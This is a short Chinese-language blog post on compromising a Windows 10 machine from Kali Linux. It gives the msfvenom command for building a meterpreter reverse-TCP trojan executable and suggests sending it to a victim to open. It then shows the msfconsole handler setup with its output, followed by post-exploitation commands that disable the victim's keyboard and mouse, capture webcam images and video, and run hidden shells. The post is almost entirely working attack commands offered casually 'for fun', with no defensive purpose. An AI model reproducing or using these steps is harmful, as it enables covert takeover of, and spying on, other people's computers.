kali滲透測試win10
阿新 • • 發佈:2018-11-10
通過msfvenom生成木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=埠號 -f exe x>XX.exe
把木馬傳過去,點開就會往自己開放的ip和埠傳送一個tcp連結
在kali中
msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 172.16.4.3 #設定本地ip lhost => 172.16.4.3 msf exploit(multi/handler) > set lport 44444 #設定本地埠 lport => 44444 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 172.16.4.3:44444
tcp連結以後可以使用以下功能
uictl開關鍵盤/滑鼠 uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/滑鼠 uictl disable mouse #禁用滑鼠 uictl disable keyboard #禁用鍵盤 webcam攝像頭命令 webcam_list #檢視攝像頭 webcam_snap #通過攝像頭拍照 webcam_stream #通過攝像頭開啟視訊 execute執行檔案 execute #在目標機中執行檔案 execute -H -i -f cmd.exe # 建立新程序cmd.exe,-H不可見,-i互動
只列出一部分詳細參見下面連結
咳咳。。。。玩玩就好